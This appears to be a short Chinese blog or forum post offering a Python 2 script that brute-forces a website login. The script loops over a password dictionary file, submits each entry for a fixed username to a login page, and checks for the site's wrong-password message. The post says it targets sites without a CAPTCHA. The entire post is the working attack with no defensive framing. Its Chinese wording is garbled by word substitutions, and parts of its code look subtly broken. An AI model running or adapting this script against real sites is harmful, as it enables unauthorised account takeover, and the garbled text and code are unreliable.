按照字典文件,利用python举办暴力破解,措施很简朴
注:针对没有验证码的环境
实例代码:
#encoding=utf-8
import httplib,urllib
conn = httplib.HTTPConnection("www.xxx.cn")
f=open("dict.txt")
while 1:
pwd=f.readline().strip()
if not pwd:
print '字典已比对完。'
break
params = urllib.urlencode({'username': 'xxx', 'mod': '', 'password': pwd})
headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
conn.request("GET", "/login/aaa.asp", params, headers)
r = conn.getresponse()
print r.status, r.reason
data1 = r.read().decode('gbk')#编码按照实际环境酌情处理惩罚
print data1.index(u'您输入的暗码有误'),'您输入的暗码\'%s\'有误'%pwd
conn.close()
